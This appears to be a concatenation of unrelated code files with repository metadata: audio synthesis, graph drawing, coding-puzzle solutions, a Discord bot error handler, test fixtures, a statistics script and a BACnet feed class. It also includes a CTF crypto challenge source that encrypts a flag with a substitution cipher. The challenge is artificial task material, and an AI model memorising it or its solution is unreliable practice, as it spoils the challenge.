if (time > times[0]):
f(control,freq)
del times[0]
def build_network():
# Assemble the network
mng = marsyas.MarSystemManager()
pnet = mng.create("Series", "pnet")
voices = mng.create("Fanout", "voices");
voices.addMarSystem(mng.create("SineSource", "src1"));
filt_noise = mng.create("Series", "filt_noise");
filt_noise.addMarSystem(mng.create("NoiseSource", "src2"));
filt_noise.addMarSystem(mng.create("Biquad", "biquad"));
filt_noise.updControl("Biquad/biquad/mrs_real/frequency", marsyas.MarControlPtr.from_real(400.0));
voices.addMarSystem(filt_noise);
mix = mng.create("Sum", "mix")
gain = mng.create("Gain", "gain")
dest = mng.create("AudioSink", "dest")
pnet.addMarSystem(voices)
pnet.addMarSystem(mix)
pnet.addMarSystem(gain)
pnet.addMarSystem(dest)
pnet.linkControl("mrs_real/f1",
"Fanout/voices/SineSource/src1/mrs_real/frequency");
pnet.linkControl("mrs_real/f2",
"Fanout/voices/Series/filt_noise/Biquad/biquad/mrs_real/frequency");
pnet.updControl("mrs_real/israte",
marsyas.MarControlPtr.from_real(44100.0))
pnet.updControl("AudioSink/dest/mrs_bool/initAudio",
marsyas.MarControlPtr.from_bool(True))
return pnet
pnet = build_network()
bufferSize = pnet.getControl("mrs_natural/inSamples").to_natural();
srate = pnet.getControl("mrs_real/osrate").to_real();
tstep = bufferSize * 1.0 / srate
f1 = pnet.getControl("mrs_real/f1")
f2 = pnet.getControl("mrs_real/f2")
# Bohlen/Pierce scale
ratios = [ 1, 25.0/21, 9.0/7, 7.0/5, 5./3, 9./5, 15./7, 7./3, 25./9, 3./1]
frequencies = [x * 440 for x in ratios]
times1 = [x * 0.8 for x in ratios] # event times
times2 = [x * 0.2 for x in range(1, 100)]
time = 0; # time in seconds
while(time < 6.0):
# dispatch(time, times1, set_freq, f1, frequencies[random.randint(1,len(frequencies)-1)])
dispatch(time, times2, set_freq, f1, mtof(math.fabs(math.sin(time) * 110)))
pnet.tick()
time = time + tstep
pnet.updControl("AudioSink/dest/mrs_bool/mute",
marsyas.MarControlPtr.from_bool(True))
pnet.updControl("Gain/gain/mrs_real/gain",
marsyas.MarControlPtr.from_real(0.0))
del pnet
print "Done"
| 29.818182 | 103 | 0.636814 |
a4691d17b47d44eb5109026ed6f99a3f1b2ed3dc
| 614 |
py
|
Python
|
algos/longest_path.py
|
weberja/praktikum_graphen
|
da3ecefdf1327078697e3787cfe19414a9ac13c4
|
[
"Apache-2.0"
] | 1 |
2021-07-22T10:28:40.000Z
|
2021-07-22T10:28:40.000Z
|
algos/longest_path.py
|
weberja/praktikum_graphen
|
da3ecefdf1327078697e3787cfe19414a9ac13c4
|
[
"Apache-2.0"
] | null | null | null |
algos/longest_path.py
|
weberja/praktikum_graphen
|
da3ecefdf1327078697e3787cfe19414a9ac13c4
|
[
"Apache-2.0"
] | null | null | null |
from pathlib import Path
import matplotlib.pyplot as plt
import networkx as nx
import algos.walker as wk
from helper_functions import graph_helper_functions as gh
def run(path, figsize=(20, 20), key=None):
G = gh.load_file(path, key=key)
G.greedy_cycle_removal()
G.longest_path_layering()
pos = wk.tree_layout(G.to_tree())
for u in G.nodes:
x, y = pos[u]
pos[u] = (x, -G.nodes[u]['level'])
print("Drawing...")
plt.figure(figsize=figsize)
nx.draw(G, pos=pos, with_labels=True)
print("Writing to file...")
plt.savefig(f'results/{Path(path).stem}.png')
| 22.740741 | 57 | 0.659609 |
74c4772af7109ae98aa0b7f769064ee7dd9fb758
| 378 |
py
|
Python
|
leetcode/319-Bulb-Switcher/BulbSwitcher_001_TLE.py
|
cc13ny/all-in
|
bc0b01e44e121ea68724da16f25f7e24386c53de
|
[
"MIT"
] | 1 |
2015-12-16T04:01:03.000Z
|
2015-12-16T04:01:03.000Z
|
leetcode/319-Bulb-Switcher/BulbSwitcher_001_TLE.py
|
cc13ny/all-in
|
bc0b01e44e121ea68724da16f25f7e24386c53de
|
[
"MIT"
] | 1 |
2016-02-09T06:00:07.000Z
|
2016-02-09T07:20:13.000Z
|
leetcode/319-Bulb-Switcher/BulbSwitcher_001_TLE.py
|
cc13ny/all-in
|
bc0b01e44e121ea68724da16f25f7e24386c53de
|
[
"MIT"
] | 2 |
2019-06-27T09:07:26.000Z
|
2019-07-01T04:40:13.000Z
|
class Solution(object):
def bulbSwitch(self, n):
"""
:type n: int
:rtype: int
"""
num_of_facs = [1 for i in range(n)]
for j in range(2, n + 1):
            for k in range(1, n // j + 1):
num_of_facs[j * k - 1] += 1
res = 0
for num in num_of_facs:
res += num % 2
return res
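# Added note: a bulb ends up on iff its index has an odd number of divisors,
# which happens exactly for perfect squares, so an O(1) equivalent (not the
# original TLE approach) is:
#
#   import math
#   def bulbSwitch(n):
#       return math.isqrt(n)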
| 22.235294 | 43 | 0.42328 |
77e8ce286a904effb315a4c8fe17cdd31db3e301
| 7,990 |
py
|
Python
|
Extensions/Error-Handler.py
|
Drageast/Die_Botin
|
b574166a37c0f92c34db99931c8c894390fbead9
|
[
"BSD-3-Clause"
] | null | null | null |
Extensions/Error-Handler.py
|
Drageast/Die_Botin
|
b574166a37c0f92c34db99931c8c894390fbead9
|
[
"BSD-3-Clause"
] | null | null | null |
Extensions/Error-Handler.py
|
Drageast/Die_Botin
|
b574166a37c0f92c34db99931c8c894390fbead9
|
[
"BSD-3-Clause"
] | null | null | null |
# Import
import asyncio
import datetime
import traceback
from datetime import datetime
import aiohttp
import discord
from discord import Webhook, AsyncWebhookAdapter
from discord.ext import commands
# Utils
import Utils
# Cog Initialising
class ErrorHandling(commands.Cog):
def __init__(self, client):
self.client = client
# ERROR_HANDLER
@commands.Cog.listener()
async def on_command_error(self, ctx, error):
if isinstance(error, commands.CheckFailure):
try:
await ctx.message.delete()
except Exception as e:
return
return
        # `isinstance(error, A or B)` only ever checked class A, so the
        # classes are listed in a tuple instead
        elif isinstance(error, (commands.DisabledCommand, commands.NoPrivateMessage,
                                commands.BadArgument, commands.ArgumentParsingError,
                                commands.BadBoolArgument, commands.MissingRequiredArgument,
                                commands.TooManyArguments, commands.MissingPermissions,
                                commands.BotMissingPermissions, commands.NotOwner,
                                commands.CommandOnCooldown, commands.CheckFailure)):
embed = discord.Embed(
title=f'{Utils.YamlContainerManagement.GET_yamlAttr("Embed", "HTitle")}',
colour=discord.Colour(Utils.Farbe.Dark_Blue),
description=f'Fehler:\n`{error}`\n'
)
embed.set_thumbnail(url=self.client.user.avatar_url)
try:
await ctx.message.delete()
except discord.HTTPException:
pass
m = await ctx.send(embed=embed)
await asyncio.sleep(15)
try:
await m.delete()
except discord.HTTPException:
pass
elif isinstance(error, commands.CommandInvokeError):
if isinstance(error.original, Utils.DatabasePreconditioning):
embed = discord.Embed(
title=f'{Utils.YamlContainerManagement.GET_yamlAttr("Embed", "HTitle")}',
colour=discord.Colour(Utils.Farbe.Dark_Blue),
description=f'Ein Fehler in der Datenbank ist aufgetreten:\n`{error}`\n'
)
embed.set_thumbnail(url=self.client.user.avatar_url)
try:
await ctx.message.delete()
except discord.HTTPException:
pass
m = await ctx.send(embed=embed)
await asyncio.sleep(15)
try:
await m.delete()
except discord.HTTPException:
pass
else:
owner = await self.client.fetch_user(Utils.YamlContainerManagement.GET_yamlAttr("Variablen", "Dev_IDs", "Drageast"))
embed = discord.Embed(
title='ACHTUNG!',
colour=discord.Colour(Utils.Farbe.Dark_Blue),
description='Der Command ist **korrumpiert**!\nTritt dieser Fehler erneut auf, '
f'kontaktiere **dringend** meinen Developer: {owner.mention}'
)
embed.add_field(name='**LOG:**', value=f'```css\n[{error}]\n```')
embed.set_thumbnail(url=self.client.user.avatar_url)
async with aiohttp.ClientSession() as session:
url = Utils.YamlContainerManagement.GET_yamlAttr("Variablen", "ClientSide", "ClientWebhooks", "ErrorHook")
webhook = Webhook.from_url(url, adapter=AsyncWebhookAdapter(session))
timestamp = datetime.utcnow()
trace = traceback.format_exception(None, error, error.__traceback__)
erembed = discord.Embed(
title="\u200b\nEin schwerwiegender Fehler ist aufgetreten!\n\u200b",
colour=discord.Colour(Utils.Farbe.Dark_Blue)
)
erembed.set_author(name=f"{timestamp.strftime(r'%I:%M %p')}")
erembed.add_field(name='**OPERATOR:**', value=f'```fix\n[{ctx.author} / {ctx.author.id}]\n```',
inline=False)
try:
erembed.add_field(name='**SERVER:**', value=f'```fix\n[{ctx.guild.name}]\n```', inline=False)
erembed.add_field(name='**KANAL:**', value=f'```fix\n[{ctx.channel.name}]\n```', inline=False)
except AttributeError:
pass
erembed.add_field(name='**COMMAND:**',
value=f'```fix\n[{self.client.command_prefix}{ctx.command.qualified_name}]\n```',
inline=False)
erembed.add_field(name='**NACHRICHT:**', value=f'```fix\n[{ctx.message.content}]\n```',
inline=False)
erembed.add_field(name='**ERROR:**', value=f'```css\n[{error}]\n```\n\n\u200b', inline=False)
erembed.add_field(name='**TRACEBACK:**', value=f'\u200b', inline=False)
erembed.set_thumbnail(url=self.client.user.avatar_url)
                for frame in trace:
                    erembed.add_field(name='\u200b', value=f'```python\n{frame}\n```', inline=False)
await webhook.send(username="Ein korrumpierter Command wurde ausgelöst!",
avatar_url=self.client.user.avatar_url, embed=erembed)
try:
await ctx.message.delete()
except discord.HTTPException:
pass
m = await ctx.send(embed=embed)
await asyncio.sleep(15)
try:
await m.delete()
except discord.HTTPException:
pass
# COMMAND_HANDLER
@commands.command(aliases=["deas"])
@commands.is_owner()
async def disable_commands(self, ctx, *, command_name):
if command_name is not None:
command = self.client.get_command(command_name)
if command is None:
embed = discord.Embed(
title=f'{Utils.YamlContainerManagement.GET_yamlAttr("Embed", "HTitle")}',
colour=discord.Colour(Utils.Farbe.Dark_Blue),
description=f'Dieser Command existiert nicht.\nÜberprüfe ihn auf Rechtschreibfehler.\nDeine Angabe: **{command_name}**'
)
embed.set_thumbnail(url=self.client.user.avatar_url)
await Utils.TimeSend.se_ctx(ctx, embed, 30)
elif command == ctx.command:
embed = discord.Embed(
title=f'{Utils.YamlContainerManagement.GET_yamlAttr("Embed", "HTitle")}',
colour=discord.Colour(Utils.Farbe.Dark_Blue),
description=f'Du darfst diesen Command nicht Deaktivieren!'
)
embed.set_thumbnail(url=self.client.user.avatar_url)
await Utils.TimeSend.se_ctx(ctx, embed, 30)
else:
command.enabled = not command.enabled
choice = "Aktiviert" if command.enabled else "Deaktiviert"
choice_colour = Utils.Farbe.Light_Blue if command.enabled else Utils.Farbe.Dark_Blue
embed = discord.Embed(
title=f'{choice}',
colour=discord.Colour(choice_colour),
description=f'Der Command: **{command}** wurde erfolgreich {choice}.'
)
embed.set_thumbnail(url=self.client.user.avatar_url)
await Utils.TimeSend.se_ctx(ctx, embed, 10)
# Cog Finishing
def setup(client):
client.add_cog(ErrorHandling(client))
| 41.185567 | 213 | 0.550313 |
7024b0db92aa1c93b80803e4a6fc27ce1bb052a4
| 915 |
py
|
Python
|
frappe-bench/apps/erpnext/erpnext/tests/utils.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | null | null | null |
frappe-bench/apps/erpnext/erpnext/tests/utils.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | null | null | null |
frappe-bench/apps/erpnext/erpnext/tests/utils.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | null | null | null |
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
def create_test_contact_and_address():
frappe.db.sql('delete from tabContact')
frappe.db.sql('delete from tabAddress')
frappe.db.sql('delete from `tabDynamic Link`')
frappe.get_doc(dict(
doctype='Address',
address_title='_Test Address for Customer',
address_type='Office',
address_line1='Station Road',
city='_Test City',
state='Test State',
country='India',
links = [dict(
link_doctype='Customer',
link_name='_Test Customer'
)]
)).insert()
frappe.get_doc(dict(
doctype='Contact',
email_id='[email protected]',
phone='+91 0000000000',
first_name='_Test Contact for _Test Customer',
links = [dict(
link_doctype='Customer',
link_name='_Test Customer'
)]
)).insert()
| 24.72973 | 68 | 0.725683 |
56444732817776a4ea0d7b414bb0febfe8d243dd
| 6,331 |
py
|
Python
|
src/test/tests/plots/multicolor.py
|
visit-dav/vis
|
c08bc6e538ecd7d30ddc6399ec3022b9e062127e
|
[
"BSD-3-Clause"
] | 226 |
2018-12-29T01:13:49.000Z
|
2022-03-30T19:16:31.000Z
|
src/test/tests/plots/multicolor.py
|
visit-dav/vis
|
c08bc6e538ecd7d30ddc6399ec3022b9e062127e
|
[
"BSD-3-Clause"
] | 5,100 |
2019-01-14T18:19:25.000Z
|
2022-03-31T23:08:36.000Z
|
src/test/tests/plots/multicolor.py
|
visit-dav/vis
|
c08bc6e538ecd7d30ddc6399ec3022b9e062127e
|
[
"BSD-3-Clause"
] | 84 |
2019-01-24T17:41:50.000Z
|
2022-03-10T10:01:46.000Z
|
# ----------------------------------------------------------------------------
# MODES: serial
# CLASSES: nightly
#
# Test Case: multicolor.py
#
# Tests: Tests setting colors using the multiColor field in some of
# our plots.
# Plots - Boundary, Contour, FilledBoundary, Subset
# Operators - Transform
#
# Programmer: Brad Whitlock
# Date: Wed Apr 6 17:52:12 PST 2005
#
# Modifications:
#
# Mark C. Miller, Thu Jul 13 22:41:56 PDT 2006
# Added test of user-specified material colors
#
# Mark C. Miller, Wed Jan 20 07:37:11 PST 2010
#    Added ability to switch between Silo's HDF5 and PDB data.
# ----------------------------------------------------------------------------
def TestColorDefinitions(testname, colors):
s = ""
for c in colors:
s = s + str(c) + "\n"
TestText(testname, s)
def TestMultiColor(section, plotAtts, decreasingOpacity):
# Get the current colors.
m = plotAtts.GetMultiColor()
# Test what the image currently looks like.
Test("multicolor_%d_00" % section)
# Change the colors all at once. We should have red->blue
for i in range(len(m)):
t = float(i) / float(len(m) - 1)
c = int(t * 255.)
m[i] = (255-c, 0, c, 255)
plotAtts.SetMultiColor(m)
SetPlotOptions(plotAtts)
Test("multicolor_%d_01" % section)
TestColorDefinitions("multicolor_%d_02" % section, plotAtts.GetMultiColor())
# Change the colors another way. We should get green to blue
for i in range(len(m)):
t = float(i) / float(len(m) - 1)
c = int(t * 255.)
plotAtts.SetMultiColor(i, 0, 255-c, c)
SetPlotOptions(plotAtts)
Test("multicolor_%d_03" % section)
TestColorDefinitions("multicolor_%d_04" % section, plotAtts.GetMultiColor())
# Change the colors another way. We should get yellow to red but
# the redder it gets, the more transparent it should also get.
for i in range(len(m)):
t = float(i) / float(len(m) - 1)
c = int(t * 255.)
if decreasingOpacity:
plotAtts.SetMultiColor(i, (255, 255-c, 0, 255 - c))
else:
plotAtts.SetMultiColor(i, (255, 255-c, 0, c))
SetPlotOptions(plotAtts)
Test("multicolor_%d_05" % section)
TestColorDefinitions("multicolor_%d_06" % section, plotAtts.GetMultiColor())
def test1():
TestSection("Testing setting of multiColor in Boundary plot")
# Set up the plot
OpenDatabase(silo_data_path("rect2d.silo"))
AddPlot("Boundary", "mat1")
b = BoundaryAttributes()
b.lineWidth = 4
DrawPlots()
# Test the plot
TestMultiColor(0, b, 0)
# Delete the plots
DeleteAllPlots()
def test2():
TestSection("Testing setting of multiColor in Contour plot")
# Set up the plot
OpenDatabase(silo_data_path("noise.silo"))
AddPlot("Contour", "hardyglobal")
c = ContourAttributes()
c.contourNLevels = 20
SetPlotOptions(c)
DrawPlots()
# Set the view.
v = GetView3D()
v.viewNormal = (-0.400348, -0.676472, 0.618148)
v.focus = (0,0,0)
v.viewUp = (-0.916338, 0.300483, -0.264639)
v.parallelScale = 17.3205
v.imagePan = (0, 0.0397866)
v.imageZoom = 1.07998
SetView3D(v)
# Test the plot
TestMultiColor(1, c, 0)
# Delete the plots
DeleteAllPlots()
def test3():
TestSection("Testing setting of multiColor in FilledBoundary plot")
# Set up the plots. First we want globe so we can see something inside
# of the Subset plot to make sure that setting alpha works.
OpenDatabase(silo_data_path("globe.silo"))
AddPlot("Pseudocolor", "w")
p = PseudocolorAttributes()
p.legendFlag = 0
p.colorTableName = "xray"
SetPlotOptions(p)
OpenDatabase(silo_data_path("bigsil.silo"))
AddPlot("FilledBoundary", "mat")
f = FilledBoundaryAttributes()
f.legendFlag = 0
SetPlotOptions(f)
# Add an operator to globe to make it small.
SetActivePlots(0)
AddOperator("Transform", 0)
t = TransformAttributes()
t.doScale = 1
t.scaleX, t.scaleY, t.scaleZ = 0.04, 0.04, 0.04
t.doTranslate = 1
t.translateX, t.translateY, t.translateZ = 0.5, 0.5, 0.5
SetOperatorOptions(t)
SetActivePlots(1)
DrawPlots()
# Set the view.
v = GetView3D()
v.viewNormal = (-0.385083, -0.737931, -0.554229)
v.focus = (0.5, 0.5, 0.5)
v.viewUp = (-0.922871, 0.310902, 0.227267)
v.parallelScale = 0.866025
v.imagePan = (-0.0165315, 0.0489375)
v.imageZoom = 1.13247
SetView3D(v)
# Test the plot
TestMultiColor(2, f, 1)
# Delete the plots
DeleteAllPlots()
def test4():
TestSection("Testing setting of multiColor in Subset plot")
# Set up the plots. First we want globe so we can see something inside
# of the Subset plot to make sure that setting alpha works.
OpenDatabase(silo_data_path("globe.silo"))
AddPlot("Pseudocolor", "w")
p = PseudocolorAttributes()
p.legendFlag = 0
p.colorTableName = "xray"
SetPlotOptions(p)
OpenDatabase(silo_data_path("bigsil.silo"))
AddPlot("Subset", "domains")
s = SubsetAttributes()
s.legendFlag = 0
SetPlotOptions(s)
# Add an operator to globe to make it small.
SetActivePlots(0)
AddOperator("Transform", 0)
t = TransformAttributes()
t.doScale = 1
t.scaleX, t.scaleY, t.scaleZ = 0.04, 0.04, 0.04
t.doTranslate = 1
t.translateX, t.translateY, t.translateZ = 0.5, 0.5, 0.5
SetOperatorOptions(t)
SetActivePlots(1)
DrawPlots()
# Set the view.
v = GetView3D()
v.viewNormal = (-0.385083, -0.737931, -0.554229)
v.focus = (0.5, 0.5, 0.5)
v.viewUp = (-0.922871, 0.310902, 0.227267)
v.parallelScale = 0.866025
v.imagePan = (-0.0165315, 0.0489375)
v.imageZoom = 1.13247
SetView3D(v)
# Test the plot
TestMultiColor(3, s, 1)
# Delete the plots
DeleteAllPlots()
def test5():
TestSection("Testing user defined colors for FilledBoundary")
ResetView()
OpenDatabase(silo_data_path("globe_matcolors.silo"))
AddPlot("FilledBoundary","mat1")
AddOperator("Slice")
DrawPlots()
Test("multicolor_matcolors")
DeleteAllPlots()
def main():
test1()
test2()
test3()
test4()
test5()
# Run the tests
main()
Exit()
| 27.526087 | 80 | 0.619491 |
8db59ad767ca866816a196da3a6146244ffa5d3c
| 195 |
py
|
Python
|
0-notes/job-search/Cracking the Coding Interview/C04TreesGraphs/questions/4.6-questions.py
|
eengineergz/Lambda
|
1fe511f7ef550aed998b75c18a432abf6ab41c5f
|
[
"MIT"
] | null | null | null |
0-notes/job-search/Cracking the Coding Interview/C04TreesGraphs/questions/4.6-questions.py
|
eengineergz/Lambda
|
1fe511f7ef550aed998b75c18a432abf6ab41c5f
|
[
"MIT"
] | null | null | null |
0-notes/job-search/Cracking the Coding Interview/C04TreesGraphs/questions/4.6-questions.py
|
eengineergz/Lambda
|
1fe511f7ef550aed998b75c18a432abf6ab41c5f
|
[
"MIT"
] | null | null | null |
# 4.6 Successor
# Write an algorithm to find the "next" node (i.e. in-order successor) of a given node in a binary
# search tree.
# You may assume that each node has a link to its parent.
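# A minimal sketch of one approach (not part of the original question file);
# it assumes a node type exposing left, right and parent attributes.
def successor(node):
    # Case 1: a right subtree exists -> successor is its leftmost node.
    if node.right:
        node = node.right
        while node.left:
            node = node.left
        return node
    # Case 2: climb until we arrive from a left child; that parent is next.
    while node.parent and node is node.parent.right:
        node = node.parent
    return node.parent  # None when node holds the maximum key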
| 27.857143 | 98 | 0.697436 |
8df6b2cabed9326fb9ee9a6f9b03957c9522e72b
| 1,211 |
py
|
Python
|
Problems/BinarySearchTree/Medium/ConstructBTPreorderPostorder/construct_bt_preorder_post_order.py
|
dolong2110/Algorithm-By-Problems-Python
|
31ecc7367aaabdd2b0ac0af7f63ca5796d70c730
|
[
"MIT"
] | 1 |
2021-08-16T14:52:05.000Z
|
2021-08-16T14:52:05.000Z
|
Problems/BinarySearchTree/Medium/ConstructBTPreorderPostorder/construct_bt_preorder_post_order.py
|
dolong2110/Algorithm-By-Problems-Python
|
31ecc7367aaabdd2b0ac0af7f63ca5796d70c730
|
[
"MIT"
] | null | null | null |
Problems/BinarySearchTree/Medium/ConstructBTPreorderPostorder/construct_bt_preorder_post_order.py
|
dolong2110/Algorithm-By-Problems-Python
|
31ecc7367aaabdd2b0ac0af7f63ca5796d70c730
|
[
"MIT"
] | null | null | null |
from typing import List, Optional
# Definition for a binary tree node.
class TreeNode:
def __init__(self, val=0, left=None, right=None):
self.val = val
self.left = left
self.right = right
# Recursive
    # The return annotation must be quoted: TreeNode is still being defined
    # at this point, so a bare name would raise NameError at class creation.
    def constructFromPrePost(self, preorder: List[int], postorder: List[int]) -> Optional["TreeNode"]:
self.pre_index, self.post_index = 0, 0
def construct():
root = TreeNode(preorder[self.pre_index])
self.pre_index += 1
if root.val != postorder[self.post_index]:
root.left = construct()
if root.val != postorder[self.post_index]:
root.right = construct()
self.post_index += 1
return root
return construct()
# Iterative
# def constructFromPrePost(self, preorder: List[int], postorder: List[int]) -> Optional[TreeNode]:
# stack = [TreeNode(preorder[0])]
# j = 0
# for v in preorder[1:]:
# node = TreeNode(v)
# while stack[-1].val == postorder[j]:
# stack.pop()
# j += 1
# if not stack[-1].left:
# stack[-1].left = node
# else:
# stack[-1].right = node
# stack.append(node)
# return stack[0]
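# Hedged usage sketch (not part of the original file): the pre/post pair
# below encodes the tree 1 -> (2 -> (4, 5), 3 -> (6, 7)).
if __name__ == "__main__":
    root = TreeNode().constructFromPrePost([1, 2, 4, 5, 3, 6, 7],
                                           [4, 5, 2, 6, 7, 3, 1])
    print(root.val, root.left.val, root.right.val)  # 1 2 3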
| 25.765957 | 98 | 0.573906 |
5c2e78f6ec9188752e839badd8479abebd9464c3
| 2,878 |
py
|
Python
|
015-C111-ZTests/__main__.py
|
somePythonProgrammer/PythonCode
|
fb2b2245db631cefd916a960768f411969b0e78f
|
[
"MIT"
] | 2 |
2021-09-28T13:55:20.000Z
|
2021-11-15T10:08:49.000Z
|
015-C111-ZTests/__main__.py
|
somePythonProgrammer/PythonCode
|
fb2b2245db631cefd916a960768f411969b0e78f
|
[
"MIT"
] | null | null | null |
015-C111-ZTests/__main__.py
|
somePythonProgrammer/PythonCode
|
fb2b2245db631cefd916a960768f411969b0e78f
|
[
"MIT"
] | 1 |
2022-01-20T03:02:20.000Z
|
2022-01-20T03:02:20.000Z
|
# 015-C111-ZTests
# This is a python script made by @somePythonProgrammer
# for a WhiteHat Junior project.
import pandas as pd
import plotly.graph_objects as go
import plotly.figure_factory as ff
import statistics
import random
df = pd.read_csv('014-C110-SamplingDistribution/csv/data.csv')
marks = df['responses'].tolist()
marks.pop(0)
df_intervention = pd.read_csv('015-C111-ZTests/csv/data.csv')
marks_intervention = df_intervention['responses'].tolist()
marks_intervention.pop(0)
for i in marks_intervention:
try:
marks_intervention[marks_intervention.index(i)] = int(i)
except ValueError:
marks_intervention[marks_intervention.index(i)] = 0
for i in marks:
try:
marks[marks.index(i)] = int(i)
except ValueError:
marks[marks.index(i)] = 0
def random_indexes_mean(counter):
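    # Despite the name, this draws `counter` random marks (values, not
    # indexes) with replacement and returns their mean -- one draw from
    # the sampling distribution of the mean.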
indexes = []
for i in range(counter):
indexes.append(marks_intervention[random.randint(0, len(marks_intervention)-1)])
return statistics.mean(indexes)
def main():
_data = []
for i in range(0, 1000):
_data.append(random_indexes_mean(500))
mean = statistics.mean(marks)
mean_intervention = statistics.mean(_data)
first_std = mean + statistics.stdev(_data)
second_std = mean + 2 * statistics.stdev(_data)
third_std = mean + 3 * statistics.stdev(_data)
first_std_end = -first_std
second_std_end = -second_std
third_std_end = -third_std
print('The mean is:', mean)
print(f'The first standard deviation is {first_std}')
print(f'The second standard deviation is {second_std}')
print(f'The third standard deviation is {third_std}')
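    # Standardize the gap between the intervention mean and the baseline
    # mean against the spread of the raw intervention responses.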
z_score = (mean_intervention - mean) / statistics.stdev(marks_intervention)
print(f'The z-score is {z_score}')
plot = ff.create_distplot([_data], ['Marks'], show_hist=False)
plot.add_traces(go.Scatter(x=[first_std, first_std], y=[0, 0.7], mode='lines', name='First Standard Deviation'))
plot.add_traces(go.Scatter(x=[first_std_end, first_std_end], y=[0, 0.7], mode='lines', name='First Standard Deviation End'))
plot.add_traces(go.Scatter(x=[second_std, second_std], y=[0, 0.7], mode='lines', name='Second Standard Deviation'))
plot.add_traces(go.Scatter(x=[second_std_end, second_std_end], y=[0, 0.7], mode='lines', name='Second Standard Deviation End'))
plot.add_traces(go.Scatter(x=[third_std, third_std], y=[0, 0.7], mode='lines', name='Third Standard Deviation'))
plot.add_traces(go.Scatter(x=[third_std_end, third_std_end], y=[0, 0.7], mode='lines', name='Third Standard Deviation End'))
plot.write_html('015-C111-ZTests/index.html', auto_open = True)
if mean < mean_intervention:
print('Intervention successful!')
else:
print('Intervention failed!')
if __name__ == '__main__':
main()
| 35.530864 | 131 | 0.704656 |
ebbaa666b451a8bcca6ea804702e3e76aeadfad1
| 2,775 |
py
|
Python
|
21-fs-ias-lec/03-BACnetCore/src/core/interface/feed.py
|
cn-uofbasel/BCN
|
2d0852e00f2e7f3c4f7cf30f60c6765f2761f80a
|
[
"MIT"
] | 8 |
2020-03-17T21:12:18.000Z
|
2021-12-12T15:55:54.000Z
|
21-fs-ias-lec/03-BACnetCore/src/core/interface/feed.py
|
cn-uofbasel/BCN
|
2d0852e00f2e7f3c4f7cf30f60c6765f2761f80a
|
[
"MIT"
] | 2 |
2021-07-19T06:18:43.000Z
|
2022-02-10T12:17:58.000Z
|
21-fs-ias-lec/03-BACnetCore/src/core/interface/feed.py
|
cn-uofbasel/BCN
|
2d0852e00f2e7f3c4f7cf30f60c6765f2761f80a
|
[
"MIT"
] | 25 |
2020-03-20T09:32:45.000Z
|
2021-07-18T18:12:59.000Z
|
from .event import Event
class FeedMeta:
"""
This class represents the Metadata for every feed.
"""
def __init__(self, feed_name, public_key, signature_info):
self.feed_name = feed_name
self.public_key = public_key
self.signature_info = signature_info
def get_feed_name(self):
return self.feed_name
def get_public_key(self):
return self.public_key
def get_signature_info(self):
return self.signature_info
def __str__(self):
return f"--feed-name: {self.feed_name}\n--feed_id: {self.public_key}\n--signature-info: {self.signature_info}"
class Feed:
"""
This class is the base Interface class for every Feed.
"""
def __init__(self, feed_id, storage_controller):
self.feed_id = feed_id
self.strg_ctrl = storage_controller
# this is separated due to self.meta reference in get_feed_meta()
self.meta = None
self.meta = self.get_feed_meta()
def get_event(self, seq_num: int) -> Event:
"""
        This method tries to get a certain event. UnknownFeedError or EventNotfoundError may be raised.
"""
return self.strg_ctrl.get_event(seq_num, self.feed_id)
def get_current_seq_num(self):
"""
        This method tries to get the current sequence number of this feed. -1 is returned when the feed is not
        known or no event is in the database.
"""
return self.strg_ctrl.get_current_seq_num(self.feed_id)
def get_last_event(self):
"""
        This method tries to get the latest event of this feed. Since it uses get_event(), UnknownFeedError
        or EventNotfoundError may be raised.
"""
return self.get_event(self.get_current_seq_num())
def get_feed_id(self):
"""
Returns the feed_id of this feed
"""
return self.feed_id
def get_feed_meta(self):
"""
        Getter for the metadata of this feed. If the metadata is currently None (i.e. it could not be loaded
        yet), try to load it again. In any case, return self.meta.
"""
if self.meta is None:
self._reload_meta()
return self.meta
def _reload_meta(self):
"""
        This method tries to extract the metadata of a feed from the first event of this feed. If this fails
        (e.g. when no events of this feed are in the database), self.meta is set to None.
"""
try:
first_event = self.get_event(0)
name = self.strg_ctrl.get_name_by_feed_id(self.feed_id)
self.meta = FeedMeta(name, first_event.meta.feed_id, first_event.meta.signature_info)
except Exception:
self.meta = None
def __str__(self):
return f"\n****Feed****\n{str(self.meta)}"
| 32.267442 | 119 | 0.636396 |
ccdf8f1eac886bcd1157d7b5357039a843c4079e
| 368 |
py
|
Python
|
crypto/Shuffler/release/chall.py
|
vidner/codepwnda-ctf
|
7e086044b753fe555b44395b79827d2f5b89da1d
|
[
"Unlicense"
] | 6 |
2021-02-18T15:07:55.000Z
|
2022-02-04T01:38:10.000Z
|
crypto/Shuffler/release/chall.py
|
vidner/codepwnda-ctf
|
7e086044b753fe555b44395b79827d2f5b89da1d
|
[
"Unlicense"
] | null | null | null |
crypto/Shuffler/release/chall.py
|
vidner/codepwnda-ctf
|
7e086044b753fe555b44395b79827d2f5b89da1d
|
[
"Unlicense"
] | null | null | null |
import random, string
def encrypt(msg):
x = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
y = 'BXcjk7JCT5goWsq9Lhr2zvVISbKfGteauUHMlRiQ3Nd6A8p14OnmZ0xyYFPEwD'
z = string.maketrans(x, y)
return msg.translate(z)
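# Note (Python 2 script: string.maketrans / print statement). Re-applying a
# fixed substitution below just composes the same permutation with itself,
# so the overall cipher is still a single monoalphabetic substitution.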
pt = open('plaintext.txt').read().strip()
N = random.randint(21, 42)
ct = encrypt(pt)
for _ in range(N):
ct = encrypt(ct)
print ct
| 23 | 69 | 0.76087 |
6928501e2000846c0d8fc68cc04c0dfdb6116604
| 2,389 |
py
|
Python
|
pwn/ezrop_revenge/solve.py
|
vidner/codepwnda-ctf
|
7e086044b753fe555b44395b79827d2f5b89da1d
|
[
"Unlicense"
] | 6 |
2021-02-18T15:07:55.000Z
|
2022-02-04T01:38:10.000Z
|
pwn/ezrop_revenge/solve.py
|
vidner/codepwnda-ctf
|
7e086044b753fe555b44395b79827d2f5b89da1d
|
[
"Unlicense"
] | null | null | null |
